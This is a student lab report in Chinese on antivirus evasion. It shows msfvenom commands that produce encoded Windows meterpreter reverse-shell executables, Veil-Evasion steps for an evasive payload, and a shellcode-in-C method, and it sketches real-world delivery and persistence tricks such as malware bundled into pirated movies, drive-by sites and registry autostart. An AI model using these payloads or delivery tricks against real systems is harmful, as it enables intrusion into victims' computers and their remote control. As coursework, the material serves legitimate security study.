《网络攻防》 免杀原理与实践
20145224陈颢文 《网络攻防》 免杀原理与实践
基础问题回答
杀软是如何检测出恶意代码的?
- 基于特征码;
- 基于行为;
- 启发式。
免杀是做什么?
- 避免恶意代码被杀毒软件扫描出来被删除,让它能正常的工作。
免杀的基本方法有哪些?
- 使用不同编码方式改变特征码;
- 改变行为方式;
- 在正常软件中留后门等。
实践总结与体会
- 真是道高一尺魔高一丈啊,了解了杀软的工作原理以后才发现它也不是万能的,只能发现它认识的病毒。连我们普通大学生都能写出免杀的恶意代码可见现在做坏事的门槛之低啊,以后下载软件多留个心眼吧,尽量去官网下,下电影游戏的时候看清楚文件包里都用什么,不要把无关的文件也下下来了。
离实战还缺些什么技术或步骤?
- 我们需要一个正经的IP地址,以便不同网段的主机都可以顺利链接到我们。去租个服务器吧~
- 将恶意代码植入他人主机。捆绑到云盘的一些电影中,利用浏览器漏洞制作一个挂马网站;
- 程序如何启动,改变程序图标和名称诱使用户误点或者修改注册表加入开机自启动;
- 使用流量,弹出虚假提权窗口骗取权限,捆绑到浏览器中使用流量;
- 欺骗防火墙,使用SSL加密传输或者封装到DNS包中。
实践过程记录
以下是msfvenom直接生成的meterpreter可执行文件送检结果,作为参考:
使用Msfvenom编码器
既然杀软是根据特征码来判断恶意代码的,那么我们换种编码方式把特征码改了不就好咯~
让我们来试试:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > met-encoded10.exe
其中-e x86/shikata_ga_nai
是使用了msf自带的编码器,-i 10
是嵌套了10次,然而!还是被杀掉了:
原来shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中,这部分早已被当做特征码了,所以说怎么编都没用。
那么我们不用msf自带的编码器不就好了吗?我觉得应该是这样的,但是没有时间进行尝试...Veil-Evasion免杀
Veil-Evasion是一个很厉害的软件,他的原理是用其他编程语言重写了meterperter。但是kali默认没有安装,安装的也比较繁琐,在这里帮需要的同学排雷了(安好后赶紧做实验,安这个后kali容易崩):
apt-get update
不做这步有几率遇到以下错误:
apt-get install veil-evasion
过程很漫长就对了;
apt-get install wine
apt-get install nfs-common
apt-get install wine32
这个我也安装失败了,不过貌似没影响;
以上都完成了以后就运行veil-evasion
,初次运行过程很漫长,而且铁定会遇到以下错误:
不要担心,veil-evasion已经考虑到你会遇到问题了:
照做就行了:
安装完成后,进入evail-evasion
启动后,依次输入:
use python/meterpreter/rev_tcp
set LHOST 你自己kali的IP
set LPORT 你自己定的端口号
generate
Please enter the base name for output files (default is 'payload'):文件名
1
结果如下:
很多小朋友做到这步后发现找不到生成的文件了,请注意图中标绿色的路径,在命令行中吧他cp
出来就好啦!
我们来看看杀软们对它的态度如何:
Windows Defender
没有杀出来,再把它传到网上看看:
虽说还是被杀出来了,但是比起原来的已经降低了一般的检出率。
半手工制作
这可是杀手锏,检出率极低,具体过程保密,怕网友学了去做坏事,嘿嘿嘿~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali IP LPORT=端口号 -f c
生成恶意机器码
中途无聊,把拷出来的代码以文件形式保存起来送检,无毒无公害:
- 在恶意代码导出,写一个.C程序调用他即可;
程序送检以后只有5款杀软能检出病毒!
然而!!!
自家电脑把它给弄死了!!!
转载于:https://www.cnblogs.com/20145224kevs/p/6601303.html
《网络攻防》 免杀原理与实践相关推荐
- 《网络攻防》实验三:免杀原理与实践
<网络攻防>实验三:免杀原理与实践 世界上公认的第一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒,编写该病毒的是一对巴基斯坦兄弟,两兄弟经营着一家电脑公司,以 ...
- 20145233《网络对抗》 第三周 免杀原理与实践
20145233<网络对抗> 第三周 免杀原理与实践 实验内容 理解免杀技术原理(1分) 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧:( ...
- 2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何 ...
- 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 20145317 《网络对抗技术》免杀原理与实践
20145317 <网络对抗技术>免杀原理与实践 免杀技术 技术分类 改变特征码 加壳:使用专业的加壳软件,掩盖特征码: 使用encode等进行编码,进行异或.+1.-1等类似操作改变特征 ...
- 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践
目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...
- 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践
2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...
- 20165223《网络对抗技术》Exp3 免杀原理与实践
目录 -- 免杀原理与实践 免杀原理与实践 本次实验任务 基础知识问答 免杀扫描引擎 实验内容 正确使用msf编码器,msfvenom生成jar等文件,veil-evasion,加壳工具,使用shel ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...
最新文章
- python游戏开发的五个案例分享
- Linux的基本原则
- vb6 datagrid表格垂直居中_老板不喜欢看你的Excel表格,学完这些美化技巧,早日升职加薪...
- DIY JavaAPI CHM文档
- 从一个故事开始谈项目与团队管理
- mysql排序规则英文 数字_如何在MySQL中为日语设置模式排序规则
- 写给初学asp.net的新人们 新手学习经验
- keyset与entryset
- 拓端tecdat|matlab使用长短期记忆(LSTM)神经网络对序列数据进行分类
- java中将Excel转图片
- Vue使用命令创建项目
- 这份Java日志格式规范,拿走不谢!
- Unity(一)Scene和GameObject
- TypeScript代理模式/委托模式
- java 外部输入数据 语句_在编写Java应用程序时,如需从键盘输入各种类型的多个数据,则必须在程序的开头写上( )语句。...
- android glide面试题,Android面试:80%的面试官关于Glide都会问这几个问题!【建议收藏】...
- 成都java培训,尽在传智播客成都中心
- 清华毕业生都去哪儿了
- 【LeetCode-面试算法经典-Java实现】【226-Invert Binary Tree(反转二叉树)】
- Cadence Capture自带元件库说明
热门文章
- 谷歌学术国内镜像网址收集-查文献
- 女神节送什么给礼物女友好,2022女神节送礼合集
- JA-awd-sqlgunnews新闻管理系统
- iOS包体积优化-图片优化
- 完美解决Failed to configure a DataSource: ‘url‘ attribute is not specified and no embedded datasource的问题
- Android版计算器(java实现,包含小数、负数、括号)代码和讲解
- android 获得ram大小,Android中获取(RAM)总运存大小和可用运存大小
- 9部最佳Netflix原创恐怖电影和电视节目播出(2020年6月)
- 面对已知问题和未知问题的解决思路
- Field II 超声声场仿真(3): 脉冲-回波响应(原理代码)